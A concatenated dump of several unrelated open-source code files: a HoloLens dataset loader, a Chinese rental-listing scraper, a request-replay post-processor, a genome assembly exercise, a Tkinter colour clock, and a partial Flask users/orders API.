\"RigDataset\"\n]\nfrom typing import Tuple\nimport os\nimport cv2\nimport numpy as np\nfrom glob import glob \nfrom PIL import Image\nimport re\nfrom . import RGBFrame,\\\n DepthFrame,\\\n HumanFrame,\\\n RigFrame\n\n\nTuple8ndarray = Tuple[np.ndarray,np.ndarray,np.ndarray,np.ndarray,np.ndarray,np.ndarray,np.ndarray,np.ndarray]\n\n\nclass RGBDataset:\n def __init__(self,base:str=\"../..\"):\n meta_path = os.path.join(base,[i for i in os.listdir(base) if i.endswith(\"pv.txt\")][0])\n self.w, self.h, self.intrinsics, self.rgb2worlds, self.timestamps = self.load_meta(meta_path)\n self.paths = [os.path.join(base, \"PV\", f\"{t}.bytes\") for t in self.timestamps]\n self.sort_timeline()\n def sort_timeline(self):\n index = np.argsort(self.timestamp)\n if np.all((index[1:] - index[:-1]) > 0):\n return \n else:\n self.timestamps = self.timestamps[index]\n self.paths = self.paths[index]\n self.intrinsics = self.intrinsics[index]\n self.rgb2worlds = self.rgb2worlds[index]\n def load_meta(self,meta_path:str)->Tuple[int,int,np.ndarray,np.ndarray,np.ndarray]: \n w, h = None, None\n cx, cy = None, None\n intrinsics = []\n rgb2worlds = []\n timestamps = []\n with open(meta_path) as f:\n lines = f.readlines()\n metas = lines[0].strip().split(\",\")\n cx, cy, w, h = float(metas[0]), float(metas[1]), int(metas[2]), int(metas[3])\n for frame in lines[1:]:\n items = frame.split(',')\n timestamps.append(np.uint64(items[0]))\n fx, fy = float(items[1]), float(items[2])\n intrinsics.append(np.array([[fx, 0, w-cx],\n [0, fy, cy],\n [0, 0, 1]]))\n rgb2worlds.append(np.array(items[3:20]).astype(np.float32).reshape([4,4]))\n return w, h, \\\n np.stack(intrinsics, 0).astype(np.float32), \\\n np.stack(rgb2worlds, 0).astype(np.float32), \\\n np.array(timestamps,dtype=np.uint64)\n def load_byte(self,byte_path:str)->np.ndarray:\n with open(byte_path,\"rb\") as f:\n bgra = np.frombuffer(f.read(), dtype=np.uint8)\n bgra = bgra.reshape([self.h, self.w, 4])\n rgb = cv2.cvtColor(bgra, cv2.COLOR_BGRA2RGB)\n return rgb\n def __getitem__(self,index:int)->RGBFrame:\n return RGBFrame(rgb=self.load_byte(self.paths[index]), \n rgb2world=self.rgb2worlds[index],\n intrinsic=self.intrinsics[index],\n timestamp=self.timestamps[index])\n def __len__(self):\n return len(self.timestamps)\n def timestamp(self,t:np.uint64):\n index = np.argmin(abs(self.timestamps - t))\n return self.__getitem__(index)\n \nclass DepthDataset:\n def __init__(self, base:str=\"../..\"):\n path = [os.path.join(base,i) for i in os.listdir(base) if i.endswith(\"_lut.bin\")][0]\n self.lut = self.load_bin(path)\n path = [os.path.join(base,i) for i in os.listdir(base) if i.startswith(\"Depth\") and os.path.isdir(os.path.join(base,i))][0]\n self.paths = sorted(glob(f\"{path}/*[0-9].pgm\"))\n # self.paths = [os.path.join(path, i) for i in self.paths]\n self.timestamps = np.array([np.uint64(re.findall(f\"[0-9]+\",i)[0]) for i in self.paths]) \n def __len__(self):\n return len(self.timestamps)\n def load_pgm(self, pgm_path:str):\n return np.array(Image.open(pgm_path), dtype=np.uint16)\n def load_bin(self, bin_path:str):\n with open(bin_path, \"rb\") as f:\n lut = np.frombuffer(f.read(), dtype=\"f\").reshape([-1, 3]).astype(np.float32)\n return lut\n def __getitem__(self,index:int)->DepthFrame:\n return DepthFrame(\n depth = self.load_pgm(self.paths[index]),\n lut = self.lut,\n timestamp = self.timestamps[index]\n )\n def timestamp(self,t):\n index = np.argmin(abs(self.timestamps - t))\n return self.__getitem__(index)\n\nclass HumanDataset:\n def __init__(self,base:str=\"../..\"):\n path = [os.path.join(base,i) for i in os.listdir(base) if i.endswith(\".csv\")][0]\n self.heads,\\\n self.lefthands,\\\n self.righthands,\\\n self.gazes,\\\n self.is_lefthand_avails,\\\n self.is_righthand_avails,\\\n self.is_gaze_avails,\\\n self.timestamps = self.load_csv(path)\n def load_csv(self, csv_path:str)->Tuple8ndarray:\n timestamps = []\n heads = []\n lefthands = []\n righthands = []\n gazes = []\n is_lefthand_avails = []\n is_righthand_avails = []\n is_gaze_avails = []\n with open(csv_path) as f:\n for line in f:\n items = line.strip().split(',')\n timestamps.append(\n np.uint64(items[0])\n )\n heads.append(\n np.array(items[1:17]).astype(np.float32).reshape([4,4])\n )\n if int(items[17]) == 1:\n lefthands.append(\n np.array(items[18:434]).astype(np.float32).reshape([26, 4, 4])[:,:,3]\n )\n is_lefthand_avails.append(True)\n else:\n lefthands.append(\n np.zeros([26,4], dtype=np.float32)\n )\n is_lefthand_avails.append(False)\n if int(items[434]) == 1:\n righthands.append(\n np.array(items[435:851]).astype(np.float32).reshape([26,4,4])[:,:,3]\n )\n is_righthand_avails.append(True)\n else:\n righthands.append(\n np.zeros([26,4], dtype=np.float32)\n )\n is_righthand_avails.append(False)\n if int(items[851]) == 1:\n gazes.append(\n np.array(items[852:861]).astype(np.float32)\n )\n is_gaze_avails.append(True)\n else:\n gazes.append(\n np.zeros([9], dtype=np.float32)\n )\n is_gaze_avails.append(False)\n return np.stack(heads, 0),\\\n np.stack(lefthands, 0),\\\n np.stack(righthands,0),\\\n np.stack(gazes, 0),\\\n np.array(is_lefthand_avails),\\\n np.array(is_righthand_avails),\\\n np.array(is_gaze_avails),\\\n np.array(timestamps)\n def sort_timeline(self):\n index = np.argsort(self.timestamp)\n if np.all((index[1:] - index[:-1]) > 0):\n return \n else:\n self.timestamps = self.timestamps[index]\n self.heads = self.heads[index]\n self.lefthands = self.lefthands[index]\n self.righthands = self.righthands[index]\n self.gazes = self.gazes[index]\n self.is_lefthand_avails = self.is_lefthand_avails[index]\n self.is_righthand_avails= self.is_righthand_avails[index]\n self.is_gaze_avails = self.is_gaze_avails[index]\n def __len__(self):\n return len(self.timestamps)\n def __getitem__(self,index:int)->HumanFrame:\n return HumanFrame(\n head = self.heads[index],\n lefthand = self.lefthands[index] if self.is_lefthand_avails[index] else None,\n righthand = self.righthands[index] if self.is_righthand_avails[index] else None,\n gaze = self.gazes[index] if self.is_gaze_avails[index] else None,\n timestamp = self.timestamps[index]\n ) \n def timestamp(self, t:np.uint64):\n index = np.argmin(abs(self.timestamps - t))\n return self.__getitem__(index)\n\nclass RigDataset:\n def __init__(self,base:str=\"../..\"):\n path = [os.path.join(base,i) for i in os.listdir(base) if i.endswith(\"_rig2world.txt\")][0]\n self.rig2worlds, self.timestamps = self.load_rig2world(path)\n path = [os.path.join(base,i) for i in os.listdir(base) if i.endswith(\"_extrinsics.txt\")][0]\n self.rig2cam = self.load_extrinsics(path)\n\n def load_extrinsics(self,path:str)->np.ndarray:\n return np.loadtxt(path,delimiter=\",\").reshape([4,4]).astype(np.float32)\n def load_rig2world(self, path:str)->np.ndarray:\n timestamps = []\n rig2worlds = []\n with open(path) as f:\n for line in f:\n items = line.strip().split(',')\n timestamps.append(\n np.uint64(items[0])\n )\n rig2worlds.append(\n np.array(items[1:]).astype(np.float32).reshape([4,4])\n )\n return np.stack(rig2worlds, 0).astype(np.float32),\\\n np.array(timestamps, dtype=np.uint64)\n def __len__(self):\n return len(self.timestamps)\n def __getitem__(self, index:int)->RigFrame:\n return RigFrame(\n rig2cam = self.rig2cam,\n rig2world = self.rig2worlds[index],\n timestamp = self.timestamps[index]\n )\n def timestamp(self, t:np.uint64):\n index = np.argmin(abs(self.timestamps - t))\n return self.__getitem__(index)\n\n\nif __name__ == '__main__':\n print(RGBDataset(\".\")[10])\n print(DepthDataset(\".\")[10])\n print(HumanDataset(\".\")[10])\n print(RigDataset(\".\")[100])","repo_name":"walkerchi/ethz-mixed-reality-project","sub_path":"io/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":10016,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"18496772262","text":"\n# Description: 爬取链某网的租房信息\nimport os\nimport random\nimport re\nimport time\nfrom collections import OrderedDict\nfrom datetime import datetime\n\nimport pandas as pd\nimport requests\nfrom bs4 import BeautifulSoup\n\nfrom craw_lianjia.init_db import connection_to_mysql\nfrom craw_tools.get_ua import get_ua\n\n\nclass LianJiaHouse:\n def __init__(self, city, url, page_size, save_file_path):\n \"\"\"\n 初始化\n @param url: 主起始页\n @param page_size: 每一页的出租房屋个数\n \"\"\"\n # 城市\n self.city = city\n # 主起始页\n self.base_url = url\n # 当前筛选条件下的页面\n self.current_url = url\n # 行政区域\n self.area = []\n # 出租方式:整租+合租\n self.rental_method = ['rt200600000001', 'rt200600000002']\n # 户型:一居、二居、三居、四居+\n self.rooms_number = ['l0', 'l1', 'l2', 'l3']\n # 房间面积:<=40平米、40-60、60-80、80-100、100-120、>120\n # self.room_size = ['ra0', 'ra1', 'ra2', 'ra3', 'ra4', 'ra5']\n # 起始页码默认为0\n self.start_page = 0\n # 当前条件下的总数据页数\n self.pages = 0\n # 每一页的出租房屋个数,默认page_szie=30\n self.page_size = page_size\n # 最大页数\n self.max_pages = 100\n # 设置最大数据量,测试用\n self.count = 0\n # 本地文件保存地址\n self.save_file_path = save_file_path\n # 所有已经保存的房屋 id,用来验证去重\n self.house_id = self.get_exists_house_id()\n # 保存数据\n self.data_info = []\n # 系统等待时间:最大时间 + 最小时间(单位:秒)\n self.await_max_time = 8\n self.await_min_time = 2\n # 重连次数\n self.retry = 5\n # 爬取时间较长,所以在保存数据的时候进行数据库连接,不在此进行数据库连接\n self.pymysql_engine, self.pymysql_session = None, None\n # 设置爬虫头部,建议多设置一些,防止被封\n self.headers = {\n 'User-Agent': get_ua(),\n }\n\n def get_main_page(self):\n \"\"\"\n 进入主起始页\n @return:\n \"\"\"\n # 获取当前筛选条件下数据总条数\n soup, count_main = self.get_house_count()\n\n # 如果当前当前筛选条件下的数据个数大于最大可查询个数,则设置第一次查询条件\n if int(count_main) > self.page_size*self.max_pages:\n # 获取当前地市的所有行政区域,当做第一个查询条件\n soup_uls = soup.find_all('li', class_='filter__item--level2', attrs={'data-type': 'district'})\n self.area = self.get_area_list(soup_uls)\n\n # 遍历行政区域,重新生成筛选条件\n for area in self.area:\n self.get_area_page(area)\n else:\n # 直接获取数据\n self.get_pages(int(count_main), '', '', '')\n\n # 保存数据到数据库中\n self.data_to_sql()\n\n def get_area_page(self, area):\n \"\"\"\n 当前搜索条件:行政区域\n @param area:\n @return:\n \"\"\"\n # 重新拼接行政区域访问的 url\n self.current_url = self.base_url + area + '/'\n # 获取当前筛选条件下数据总条数\n soup, count_area = self.get_house_count()\n\n '''如果当前当前筛选条件下的数据个数大于最大可查询个数,则设置第二次查询条件'''\n if int(count_area) > self.page_size * self.max_pages:\n # 遍历出租方式,重新生成筛选条件\n for rental_method in self.rental_method:\n self.get_area_and_rental_page(area, rental_method)\n else:\n print('当前筛选条件:{0}, 共 {1} 条数据,正在获取第 {2} 页'.format(area, count_area, self.pages))\n self.get_pages(int(count_area), area, '', '')\n\n def get_area_and_rental_page(self, area, rental_method):\n \"\"\"\n 当前搜索条件:行政区域 + 出租方式\n @param area: 行政区域\n @param rental_method: 出租方式\n @return:\n \"\"\"\n # 重新拼接行政区域 + 出租方式访问的 url\n self.current_url = self.base_url + area + '/' + rental_method + '/'\n # 获取当前筛选条件下数据总条数\n soup, count_area_rental = self.get_house_count()\n\n '''如果当前当前筛选条件下的数据个数大于最大可查询个数,则设置第三次查询条件'''\n if int(count_area_rental) > self.page_size * self.max_pages:\n # 遍历房屋户型,重新生成筛选条件\n for room_number in self.rooms_number:\n self.get_area_and_rental_and_room_page(area, rental_method, room_number)\n else:\n print('当前搜索条件:{0} {1}, 共 {2} 条数据,正在获取第 {3} 页'.format(\n area, rental_method, count_area_rental, self.pages))\n self.get_pages(int(count_area_rental), area, rental_method, '')\n\n def get_area_and_rental_and_room_page(self, area, rental_method, room_number):\n \"\"\"\n 当前搜索条件:行政区域 + 出租方式 + 居室数\n @param area: 行政区域\n @param rental_method: 出租方式\n @param room_number: 居室数\n @return:\n \"\"\"\n # 重新拼接行政区域 + 出租方式 + 居室 访问的 url\n self.current_url = self.base_url + area + '/' + rental_method + room_number + '/'\n # 获取当前筛选条件下数据总条数\n soup, count_area_rental_room = self.get_house_count()\n\n '''如果当前当前筛选条件下的数据个数大于最大可查询个数,则设置第三次查询条件'''\n if int(count_area_rental_room) > self.page_size * self.max_pages:\n print('==================无法获取所有数据,当前筛选条件数据个数超过总数,将爬取前100页数据')\n # send_email()\n print('当前搜索条件:{0} {1} {2}, 共 {3} 条数据,正在获取第 {4} 页'.format(\n area, rental_method, room_number, count_area_rental_room, self.pages))\n self.get_pages(int(self.page_size * self.max_pages), area, rental_method, room_number)\n\n else:\n print('当前搜索条件:{0} {1} {2}, 共 {3} 条数据,正在获取第 {4} 页'.format(\n area, rental_method, room_number, count_area_rental_room, self.pages))\n self.get_pages(int(count_area_rental_room), area, rental_method, room_number)\n\n def get_pages(self, count_number, area, rental_method, room_number):\n \"\"\"\n 根据查询到的页面总数据,确定分页\n @param count_number: 总数据量\n @param area: 区域\n @param rental_method: 出租方式\n @param room_number:居室数\n @return:\n \"\"\"\n # 确定页数\n self.pages = int(count_number/self.page_size) \\\n if (count_number%self.page_size) == 0 else int(count_number/self.page_size)+1\n\n '''遍历每一页'''\n for page_index in range(1, self.pages+1):\n self.current_url = self.base_url + area + '/' + 'pg' + str(page_index) + rental_method + room_number + '/'\n\n # 解析当前页的房屋信息,获取到每一个房屋的详细链接\n self.get_per_house()\n page_index += 1\n\n def get_per_house(self):\n \"\"\"\n 解析每一页中的每一个房屋的详细链接\n @return:\n \"\"\"\n print(self.current_url)\n # 爬取当前页码的数据\n response = requests.get(url=self.current_url, headers=self.headers)\n soup = BeautifulSoup(response.text, 'html.parser')\n\n # 定位到每一个房屋的 div (pic 标记的 div)\n soup_div_list = soup.find_all(class_='content__list--item--main')\n # 遍历获取每一个 div 的房屋详情链接和房屋地址\n for soup_div in soup_div_list:\n # 定位并获取每一个房屋的详情链接\n # detail_info = soup_div.find_all('p', class_='content__list--item--title twoline')[0].a.get('href')\n detail_info = soup_div.find_all('p', class_='content__list--item--title')[0].a.get('href')\n detail_href = 'https://nj.lianjia.com' + detail_info\n\n # 获取详细链接的编号作为房屋唯一id\n house_id = detail_info.split('/')[2].replace('.html', '')\n '''解析部分数据'''\n # 获取该页面中房屋的地址信息和其他详细信息\n detail_text = soup_div.find_all('p', class_='content__list--item--des')[0].get_text()\n info_list = detail_text.replace('\\n', '').replace(' ', '').split('/')\n # 获取房屋租金数据\n price_text = soup_div.find_all('span', class_='content__list--item-price')[0].get_text()\n\n # 如果地址信息为空,可以确定是公寓,而我们并不能在公寓详情界面拿到数据,所以,丢掉\n if len(info_list) == 5:\n # 如果当前房屋信息已经爬取过\n if self.check_exist(house_id):\n print('房屋id:{0} 已经保存,不再重复爬取!'.format(house_id))\n else:\n # 解析当前房屋的详细数据\n self.get_house_content(detail_href, house_id, info_list, price_text)\n\n return \"\"\n\n def get_house_content(self, href, house_id, info_list, price_text):\n \"\"\"\n 获取房屋详细信息页面的内容\n @param href: 详细页面链接\n @param house_id: 上个页面传递的房租id\n @param info_list: 上个页面传递的部分数据\n @param price_text: 上个页面传递的房租数据\n @return:\n \"\"\"\n # 每1000条记录需要自行决定是否要继续\n if int(self.count/1000) > 0:\n input_text = input(\"================> 是否退出?输入Q/q直接退出:\")\n\n if input_text == \"Q\" or input_text == \"q\":\n # 保存数据到数据库中\n self.data_to_sql()\n print(\"==================数据已保存数据库,程序已退出!==================\")\n exit(0)\n else:\n print(\"==================> 继续爬取数据中...\")\n self.count = 0\n\n # 生成一个有序字典,保存房屋结果\n house_info = OrderedDict()\n for i in range(0, self.retry):\n # 随机休眠3-8 秒\n time.sleep(random.randint(self.await_min_time, self.await_max_time))\n '''爬取页面,获得详细数据'''\n response = requests.get(url=href, headers=self.headers, timeout=10)\n soup = BeautifulSoup(response.text, 'html.parser')\n\n '''获取上一个页面传递的房屋数据'''\n house_info['house_address'] = info_list[0]\n house_info['house_rental_area'] = info_list[1]\n house_info['house_orientation'] = info_list[2]\n house_info['house_layout'] = info_list[3]\n house_info['house_floor'] = info_list[4]\n house_info['house_rental_price'] = price_text\n\n '''解析房源维护时间'''\n soup_div_text = soup.find_all('div', class_='content__subtitle')[0].get_text()\n house_info['house_id'] = house_id # 房源编号数据直接从上个页面获取\n # house_info['house_id'] = re.findall(r'[A-Z]*\\d{5,}', soup_div_text)[0]\n house_info['house_update_time'] = re.findall(r'\\d{4}-\\d{2}-\\d{2}', soup_div_text)[0]\n\n '''解析经纬度数据'''\n # 获取到经纬度的 script定义数据\n location_str = response.text[re.search(r'(g_conf.coord)+', response.text).span()[0]:\n re.search(r'(g_conf.subway)+', response.text).span()[0]]\n # 字符串清洗,并在键上添加引号,方便转化成字典\n location_str = location_str.replace('\\n', '').replace(' ', '').replace(\"longitude\", \"'longitude'\"). \\\n replace(\"latitude\", \"'latitude'\")\n # 获取完整经纬度数据,转换成字典,并保存\n location_dict = eval(location_str[location_str.index('{'): location_str.index('}') + 1])\n house_info['house_longitude'] = location_dict['longitude']\n house_info['house_latitude'] = location_dict['latitude']\n\n '''解析房屋出租方式(整租/合租/不限)'''\n house_info['house_rental_method'] = soup.find_all('ul', class_='content__aside__list')[0].find_all('li')[0]. \\\n get_text().replace('租赁方式:', '')\n\n '''解析房屋的标签'''\n house_info['house_tag'] = soup.find_all('p', class_='content__aside--tags')[0]. \\\n get_text().replace('\\n', '/').replace(' ', '')\n\n '''房屋其他基本信息'''\n # 定位到当前div并获取所有基本信息的 li 标签\n soup_li = soup.find_all('div', class_='content__article__info', attrs={'id': 'info'})[0]. \\\n find_all('ul')[0].find_all('li', class_='fl oneline')\n # 赋值房屋信息\n house_info['house_elevator'] = soup_li[8].get_text().replace('电梯:', '')\n house_info['house_parking'] = soup_li[10].get_text().replace('车位:', '')\n house_info['house_water'] = soup_li[11].get_text().replace('用水:', '')\n house_info['house_electricity'] = soup_li[13].get_text().replace('用电:', '')\n house_info['house_gas'] = soup_li[14].get_text().replace('燃气:', '')\n house_info['house_heating'] = soup_li[16].get_text().replace('采暖:', '')\n house_info['create_time'] = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n house_info['city'] = self.city\n\n print(house_info['house_address'])\n # 保存当前影片信息\n self.data_info.append(house_info)\n self.count += 1\n\n '''超过50条数据,保存到本地'''\n if len(self.data_info) >= 50:\n self.data_to_csv()\n # 处理无异常在,跳出循环,否则,进行重试\n break\n\n def check_exist(self, house_id):\n \"\"\"\n 检查当前要获取的房屋数据是否已经存在\n @param house_id:\n @return:\n \"\"\"\n # 通过检查当前数据中 房屋id 是否存在\n if house_id in self.house_id:\n return True\n else:\n self.house_id.append(house_id)\n return False\n\n def get_exists_house_id(self):\n \"\"\"\n 通过已经爬取到的房屋信息,并获取房屋id\n @return:\n \"\"\"\n if os.path.exists(self.save_file_path):\n df_data = pd.read_csv(self.save_file_path, encoding='utf-8', )\n return df_data['house_id'].to_list()\n else:\n return []\n\n def data_to_sql(self):\n \"\"\"\n 保存/追加数据到数据库中\n @return:\n \"\"\"\n # 连接数据库\n self.pymysql_engine, self.pymysql_session = connection_to_mysql()\n # 读取数据并保存到数据库中\n df_data = pd.read_csv(self.save_file_path, encoding='utf-8')\n # 导入数据到 mysql 中\n df_data.to_sql('t_lianjia_rent_info', self.pymysql_engine, index=False, if_exists='append')\n\n def data_to_csv(self):\n \"\"\"\n 保存/追加数据到本地\n @return:\n \"\"\"\n # 获取数据并保存成 DataFrame\n df_data = pd.DataFrame(self.data_info)\n\n if os.path.exists(self.save_file_path) and os.path.getsize(self.save_file_path):\n # 追加写入文件\n df_data.to_csv(self.save_file_path, mode='a', encoding='utf-8', header=False, index=False)\n else:\n # 写入文件,带表头\n df_data.to_csv(self.save_file_path, mode='a', encoding='utf-8', index=False)\n\n # 清空当前 数据集\n self.data_info = []\n\n def get_house_count(self):\n \"\"\"\n 获取当前筛选条件下的房屋数据个数\n @param text:\n @return:\n \"\"\"\n # 爬取区域起始页面的数据\n response = requests.get(url=self.current_url, headers=self.headers)\n # 通过 BeautifulSoup 进行页面解析\n soup = BeautifulSoup(response.text, 'html.parser')\n # 获取数据总条数\n count = soup.find_all(class_='content__title--hl')[0].string\n\n return soup, count\n\n def get_area_list(self, soup_uls):\n \"\"\"\n 获取地市的所有行政区域信息,并保存\n @param soup_uls:\n @return:\n \"\"\"\n area_list = []\n for soup_ul in soup_uls:\n # 获取 ul 中的 a 标签的 href 信息中的区域属性\n href = soup_ul.a.get('href')\n # 跳过第一条数据\n if href.endswith('/zufang/'):\n continue\n else:\n # 获取区域数据,保存到列表中\n area_list.append(href.replace('/zufang/', '').replace('/', ''))\n\n return area_list\n\n\nif __name__ == '__main__':\n city_number = 'nj'\n city_name = '南京'\n url = 'https://{0}.lianjia.com/zufang/'.format(city_number)\n page_size = 30\n save_file_path = r'D:\\project\\craw_lianjia\\data\\data_house.csv'\n lianjia_house = LianJiaHouse(city_name, url, page_size, save_file_path)\n lianjia_house.get_main_page()","repo_name":"chenyibelive/craw_lianjia","sub_path":"craw_lianjia/craw_lianjia_house.py","file_name":"craw_lianjia_house.py","file_ext":"py","file_size_in_byte":17778,"program_lang":"python","lang":"zh","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"43495937567","text":"# -*- coding: utf-8 -*-\nimport logging\nimport urllib.parse\n\nimport httpx\nimport pandas as pd\n\nlogger = logging.getLogger(__name__)\n\n\nclass ReplayPost:\n def __init__(self, df: pd.DataFrame):\n self.df = df\n\n def process_response(self):\n \"\"\"\n 后处理一些reponse信息\n @return:\n \"\"\"\n self.df['http_code'] = self.df['response_obj'].map(\n lambda x: x.status_code if isinstance(x, httpx.Response) and x else \"null\")\n self.df['elapsed_time'] = self.df['response_obj'].map(\n lambda x: x.elapsed.total_seconds() if isinstance(x, httpx.Response) and x else 0)\n self.df['response'] = self.df['response_obj'].map(\n lambda x: x.text if isinstance(x, httpx.Response) and x else x)\n\n self.df['get_params'] = self.df['get_params'].map(urllib.parse.urlencode)\n self.df.drop(columns=['response_obj'], inplace=True)\n logger.info(f'共发送请求 {self.df.shape[0]} 个')\n","repo_name":"factoid233/python_goreplay","sub_path":"src/replay/replay_post.py","file_name":"replay_post.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"40595453071","text":"def match(s1,s2):\n index=-1\n for i in range(min(len(s1),len(s2))//2,min(len(s1),len(s2))):\n if s1[len(s1)-i:]==s2[:i]:\n index=i\n return index\n\ndef long(strings):\n def compare():\n pairs=[]\n for i in range(len(strings)):\n for j in range(len(strings)):\n if i!=j:\n _,s1=strings[i]\n _,s2=strings[j]\n m=match(s1,s2)\n if m>0:\n pairs.append((i,j,m,s1,s2))\n return pairs\n def split(pairs):\n froms=[]\n tos=[]\n for (a,b,_,_,_) in pairs:\n froms.append(a)\n tos.append(b)\n return (froms,tos)\n def get_unmatched(froms,tos):\n for i in range(len(froms)):\n matched=False\n for j in range(len(tos)):\n if tos[j]==froms[i]:\n matched=True\n break\n if not matched:\n return i\n\n pairs=compare()\n genome=[]\n while len(pairs)>0:\n (froms,tos)=split(pairs)\n index=get_unmatched(froms,tos)\n pair=pairs[index]\n _,_,length,pre,post=pair\n del pairs[index]\n if len(genome)==0:\n genome.append(pre)\n genome.append(post[length:])\n return ''.join(genome)\n\nif __name__=='__main__':\n def combine(seq_record):\n return (seq_record.id,str(seq_record.seq))\n\n from Bio import SeqIO\n print (long([combine(seq_record) for seq_record in SeqIO.parse(\"c:/Users/Weka/Downloads/rosalind_long.txt\", \"fasta\")]))\n","repo_name":"weka511/bioinformatics","sub_path":"LONG.py","file_name":"LONG.py","file_ext":"py","file_size_in_byte":1584,"program_lang":"python","lang":"en","doc_type":"code","stars":105,"dataset":"github-code","pt":"54"} +{"seq_id":"5796208957","text":"from tkinter import *\nfrom tkinter import messagebox as m\nimport random\nimport time\n\nroot=Tk()\nroot.geometry(\"1030x2100\")\nroot.config(bg=\"black\")\n\ncolor=[\n\t\"red\",\n\t\"orange\",\n\t\"blue\",\n\t\"magenta\",\n\t\"red\",\n\t\"yellow\",\n\t\"cyan\",\n\t\"blue\",\n\t\"green\",\n\t\"white\",\n]\n#===================================\ndef exit():\n\tvar=m.askquestion(\"EXIT\",\"Do You Want To Exit .\")\n\tif var ==\"yes\":\n\t\troot.destroy()\n\t\t\n#===================================\t\ndef change ():\n\ttop=Toplevel ()\n\ttop.geometry(\"1030x2100\")\n\tfor i in range (1,1000):\n\t\trc=random.choice(color)\n\t\ttop.config(bg=rc)\n\t\ttop.update_idletasks()\n\ttop.mainloop()\n\t\n#===================================\ndef start ():\n\t\n\t\n\tr=random.choice(color)\n\tlbl.config(fg=r)\n\troot.update_idletasks()\n\troot.config(bg=\"black\")\n\tTime=time.strftime(\"%H:%M:%S\")\n\tlbl.config(text=Time)\n\tlbl.after(100,start)\n\t\n\n\n#Label\t\n#===================================\nname=Label(\n\troot,\n\ttext=\"developer by: SIDHARTH \",\n\tfont=(\"times new roman \",5 ,\"bold\",\"italic\"),\n\tbg=\"black\",\n\tfg=\"orange\"\n)\nname.pack( anchor=E)\nlbl=Label(\n\troot,\n\tfont=(\"times New roman\",25),\n\tbg=\"black\",\n\tfg=\"white\",\n)\n\nlbl.pack(pady=800)\n\n\t\n\n\n#start button\n#===================================\nbt=Button(\n\troot,\n\ttext=\"START\",\n\tbg=\"cyan\",\n\tfg=\"black\",\n\tactivebackground=\"cyan\",\n\tactiveforeground=\"black\",\n\trelief=FLAT,\n\tbd=10,\n\tcommand=start,\n\tpadx=100\n\t\n)\nbt.pack(anchor=S)\n\n#exit button\n#===================================\nbt=Button(\n\troot,\n\ttext=\"EXIT\",\n\tbg=\"cyan\",\n\tfg=\"black\",\n\tactivebackground=\"cyan\",\n\tactiveforeground=\"black\",\n\trelief=FLAT,\n\tbd=10,\n\tcommand=exit,\n\tpadx=133\n\t\n)\nbt.pack(side=RIGHT)\n\t\n#color change button\n#===================================\t\nbtn=Button (\n\troot,\n\ttext=\"Change Color\",\n\tbg=\"cyan\",\n\tfg=\"black\",\n\tactivebackground=\"cyan\",\n\tactiveforeground=\"black\",\n\trelief=FLAT,\n\tbd=10,\n\tcommand=change,\n)\nbtn.pack(side=\"left\",padx=0)\t\n\nroot.mainloop()","repo_name":"sid-hack3r/Tk_Color_Clock","sub_path":"color_clock.py","file_name":"color_clock.py","file_ext":"py","file_size_in_byte":1858,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"35192512879","text":"import json\n\nfrom flask import jsonify, request\nfrom sqlalchemy.sql.elements import and_\n\nfrom config import app, db\nfrom creat_db import init_db\nfrom models import Users, Order, Offer\n\n@app.route('/users/', methods=['GET', 'POST'])\ndef get_users():\n if request.method == 'POST':\n data = request.json\n all_users = db.session.query(Users).all()\n all_users_id = []\n for user_ in all_users:\n all_users_id.append(user_.id)\n if data.get('id') not in all_users_id:\n new_user = Users(id=data.get('id'),\n first_name=data.get('first_name'),\n last_name=data.get('last_name'),\n age=data.get('age'),\n email=data.get('email'),\n role=data.get('role'),\n phone=data.get('phone'))\n db.session.add(new_user)\n db.session.commit()\n db.session.close()\n return f\"User {data.get('id')} created\"\n else:\n return f\"User with id {data.get('id')} already exists\"\n elif request.method == 'GET':\n all_users = db.session.query(Users).all()\n all_users_list = []\n for user_ in all_users:\n temp_dict = {}\n temp_dict['id'] = user_.id\n temp_dict['age'] = user_.age\n temp_dict['first_name'] = user_.first_name\n temp_dict['last_name'] = user_.last_name\n temp_dict['last_name'] = user_.last_name\n temp_dict['email'] = user_.email\n temp_dict['phone'] = user_.phone\n all_users_list.append(temp_dict)\n return jsonify(all_users_list)\n\n@app.route('/users/<int:uid>/', methods=['GET', 'PUT', 'DELETE'])\ndef users_id(uid):\n \"\"\"одиночный пользователь. получение, изменение и удаление\"\"\"\n all_users = db.session.query(Users).filter(Users.id == uid).first()\n if all_users:\n if request.method == 'GET':\n temp_dict = {}\n temp_dict['id'] = all_users.id\n temp_dict['age'] = all_users.age\n temp_dict['first_name'] = all_users.first_name\n temp_dict['last_name'] = all_users.last_name\n temp_dict['last_name'] = all_users.last_name\n temp_dict['email'] = all_users.email\n temp_dict['phone'] = all_users.phone\n return jsonify(temp_dict)\n\n elif request.method == 'DELETE':\n item_del = Users.query.get(uid)\n db.session.delete(item_del)\n db.session.commit()\n db.session.close()\n return f'Item - {uid} removed from DB'\n elif request.method == 'PUT':\n item_put = Users.query.get(uid)\n new_data = request.json\n\n item_put.first_name = new_data.get('first_name')\n item_put.last_name = new_data.get('last_name')\n item_put.age = new_data.get('age')\n item_put.email = new_data.get('email')\n item_put.role = new_data.get('role')\n item_put.phone = new_data.get('phone')\n\n db.session.add(item_put)\n db.session.commit()\n db.session.close()\n return f'Item {uid} changed'\n\n return 'Unknown type request'\n return 'Not found'\n\n@app.route('/orders/', methods=['GET', 'POST'])\ndef orders():\n all_orders = db.session.query(Order).all()\n all_orders_list = []\n for order_ in all_orders:\n temp_dict = {}\n temp_dict['id'] = order_.id\n temp_dict['name'] = order_.name\n temp_dict['address'] = order_.address\n temp_dict['price'] = order_.price\n temp_dict['customer_name'] = ''\n temp_dict['executor_name'] = ''\n if order_.customer:\n temp_dict['customer_name'] = order_.customer.first_name\n if order_.executor:\n temp_dict['executor_name'] = order_.executor.first_name\n all_orders_list.append(temp_dict)\n return jsonify(all_orders_list)\n\n\n@app.route('/orders/<int:uid>/', methods=['GET', 'PUT', 'DELETE'])\ndef orders_id(uid):\n all_orders = db.session.query(Order).filter(Order.id == uid).one()\n if all_orders:\n if request.method == 